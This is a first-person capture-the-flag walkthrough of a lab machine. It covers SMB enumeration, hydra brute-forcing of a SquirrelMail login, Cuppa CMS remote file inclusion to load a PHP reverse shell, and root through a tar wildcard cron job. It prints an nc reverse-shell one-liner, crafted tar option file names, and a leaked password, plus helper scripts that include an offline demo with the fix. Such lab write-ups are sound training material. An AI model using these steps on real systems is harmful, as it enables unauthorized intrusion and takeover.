Hi guys, this is my first writeup; I hope you find my solution easy to follow.
Deploy your machine, make sure your VPN is running and LET’S GO.
#Step 1: NMAP
- -sC = run the default NSE scripts
- -sV = service/version detection
- -A = aggressive scan (OS detection, version detection, script scanning and traceroute; it already implies -sC and -sV)
- -T5 = insane timing (fastest, but it can drop ports on a slow VPN link; rerun with -T4 if something looks missing)
- -oN = save the normal text output to a file
I noticed that Samba (SMB) is open, so the first thing I did was map the shares, with the following command:
smbmap -H <IP>
The share called "anonymous" is readable, so we connect to it straight away with smbclient, using "anonymous" as the username.
I was able to log in without a password and pull down an interesting file, "attention.txt", with the command: get attention.txt
So milesdyson is a possible username. Let's enumerate more: reconnect to the anonymous share, cd logs, and grab all the files with the command: mget *
Open the file called "log1.txt"; it looks interesting, as there are possible passwords inside.
Let's enumerate again, with the following command: enum4linux -a -r <IP>. The output confirms that milesdyson is a user.
#Gobuster:
I use gobuster to brute-force directories and, luckily, we find an interesting one:
/squirrelmail. Browsing to it, we land on a login page.
#Burp Suite:
The first thing that came to mind was to capture the login request with Burp Suite, submitting for example test as the user and test as the password.
Since we already have possible passwords in "log1.txt", it occurred to me to brute-force the form with hydra's http-form-post module:
hydra -l milesdyson -P log1.txt 10.10.133.233 http-form-post "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." -V
The form path and parameter names come from the request Burp captured, and the failure string "Unknown user or password incorrect." comes from the response to the wrong test/test login; hydra treats any response that does not contain that string as a successful login, so the string must be copied exactly. Remember to pass log1.txt as the password list. And finally, PASSWORD FOUND:
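Getting the target string right is where most hydra form attacks go wrong, so here is a small helper, added as an example and not part of the original writeup, that builds the "path:body:failure" string from the raw request Burp shows. The request it parses is constructed here to match the SquirrelMail form above (test/test submitted); the only assumption is a single-line application/x-www-form-urlencoded body.

```shell
#!/bin/sh
# Added example, not from the original writeup: build hydra's http-form-post
# target string ("<path>:<body with ^USER^/^PASS^>:<failure text>") from the raw
# request captured in Burp. The request below is constructed to match the
# SquirrelMail login form described above (test/test submitted).
# Assumption: a single-line application/x-www-form-urlencoded body.

make_sample_request() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.133.233
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

login_username=test&secretkey=test&js_autodetect_results=1&just_logged_in=1
EOF
    echo "$f"
}

# $1 = request file, $2 = username field, $3 = password field, $4 = failure text
hydra_form_string() {
    req=$(tr -d '\r' < "$1")                       # Burp saves CRLF line endings
    path=$(printf '%s\n' "$req" | awk 'NR == 1 { print $2 }')
    body=$(printf '%s\n' "$req" | awk 'in_body { print } /^$/ { in_body = 1 }')
    # Swap the values we typed (test/test) for hydra's placeholders; every other
    # field is left exactly as the browser sent it, so the server sees a real login.
    body=$(printf '%s' "$body" | sed "s/$2=[^&]*/$2=^USER^/; s/$3=[^&]*/$3=^PASS^/")
    printf '%s:%s:%s\n' "$path" "$body" "$4"
}

REQ=$(make_sample_request)
TARGET=$(hydra_form_string "$REQ" login_username secretkey 'Unknown user or password incorrect.')
HOST=$(tr -d '\r' < "$REQ" | awk '/^Host:/ { print $2 }')
echo "hydra -l milesdyson -P log1.txt $HOST http-form-post \"$TARGET\" -V"
rm -f "$REQ"
```

The printed command is the same one used above. Keeping the extra hidden fields (js_autodetect_results, just_logged_in) in the body matters: strip them and some applications answer differently, which can turn every guess into a false positive or a false negative.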
OK, we can log in to the webmail, and in the mailbox we find a "Samba Password reset" message, which gives us:
Password: )s{A&2Z=F^n_E.B`
Now we can access the Samba share of the user "milesdyson":
smbclient //IP/milesdyson -U "milesdyson" and, as the password, use the one we just found.
cd notes and extract all the files, as before, with the mget * command.
I did not find anything interesting except one file, "important.txt",
and there we finally find the hidden directory!
OK, let's browse to this directory.
We find nothing interesting there, so let's enumerate this directory too with gobuster.
#Gobuster (Again):
gobuster dir -u http://IP/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 64
And this time we find a good one: a directory hosting a Cuppa CMS login page.
At this point I tried various techniques to bypass the login, but nothing worked. So I just googled "CMS Cuppa exploit" and found a remote file inclusion (RFI) exploit.
Then I just followed what the exploit told me, and finally ...
Now I can finally try to upload the reverse shell. pentestmonkey's php-reverse-shell ships by default in Kali Linux; otherwise download it from the following link: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php Or follow my commands:
Change only the IP (and the port, if you listen on something other than the default 1234); remember it is the IP of your VPN interface, not your LAN address.
Now serve the reverse shell over HTTP and start a listener. Follow my commands:
python3 -m http.server 8080
nc -lnvp 1234
and now, in the browser, point the vulnerable include at the shell served from your machine (http://<your VPN IP>:8080/php-reverse-shell.php), like this:
and finally:
A remote include like this only works because the target's PHP is allowed to include remote URLs; make sure the nc listener is up before you trigger it, or the shell connects to nothing and you have to do it again.
Now there is a problem. From here on I really banged my head against it; I didn't understand what was going on and tried everything. In the end I just googled and found the solution.
#Vertical Privilege Escalation:
I googled: privilege escalation .tgz
and finally found the solution; here is the link: https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
As the linked article explains, the trick works because a job running as root archives this directory with tar and an unquoted *, so any file whose name starts with -- is expanded by the shell into the command line and parsed by tar as an option. First move to the directory /var/www/html and follow my commands:
Step1: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.158.245 7777 >/tmp/f" > rev.sh
Step2: echo "" > "--checkpoint-action=exec=sh rev.sh"
Step3: echo "" > --checkpoint=1
On your attacking machine, listen on port 7777 with the command (ideally start it before creating the files, so the first run of the job already has something to connect to):
nc -lnvp 7777
Wait a few minutes for the scheduled job to run, and finally!! WE ARE ROOT.
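To see why those three files are enough, here is an offline demonstration of the wildcard trick, added as an example and not part of the original writeup or the linked article. It assumes GNU tar and that the root-run job looks like tar cf <archive> * executed inside the directory (the writeup never shows the job itself); the payload only drops a marker file instead of starting the nc reverse shell, so it is safe to run on your own box, and it runs the fixed invocation alongside for comparison.

```shell
#!/bin/sh
# Added demonstration, not from the original writeup: an unquoted * in a tar
# command line expands to the file names in the directory, and GNU tar parses
# names starting with -- as options. Assumptions: GNU tar is installed, and the
# root-run job is "tar cf <archive> *" executed inside the target directory.
# The payload only creates a marker file instead of spawning a reverse shell,
# so everything runs offline in a scratch directory.

# $1 = "unsafe" (bare *, as on the target) or "safe" (the fixed invocation)
tar_wildcard_demo() {
    tar --version 2>/dev/null | grep -q GNU || { echo skipped; return 0; }
    work=$(mktemp -d)
    out=$(mktemp -d)
    echo "index" > "$work/index.html"                       # an ordinary web file
    printf 'touch %s/pwned\n' "$work" > "$work/rev.sh"     # stands in for the nc reverse shell
    # The two crafted file names from the writeup: --checkpoint=1 makes tar fire a
    # checkpoint on every record, and --checkpoint-action runs our script at each one.
    echo "" > "$work/--checkpoint-action=exec=sh rev.sh"
    echo "" > "$work/--checkpoint=1"
    if [ "$1" = safe ]; then
        # "--" ends option parsing, so the crafted names are archived as plain files
        ( cd "$work" && tar cf "$out/backup.tgz" -- * ) 2>/dev/null || true
    else
        ( cd "$work" && tar cf "$out/backup.tgz" * ) 2>/dev/null || true
    fi
    if [ -e "$work/pwned" ]; then echo executed; else echo not-executed; fi
    rm -rf "$work" "$out"
}

echo "unquoted *: $(tar_wildcard_demo unsafe)"   # executed
echo "with --:    $(tar_wildcard_demo safe)"     # not-executed
```

The fix on the defending side is the same one the safe branch shows: never let a privileged script glob a directory that unprivileged users can write to. Put -- before the wildcard, or better, give tar the directory itself (tar cf backup.tgz /var/www/html) so the shell never expands attacker-controlled names into arguments.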
Thanks to everyone for following the writeup; I hope it was useful. Good luck guys.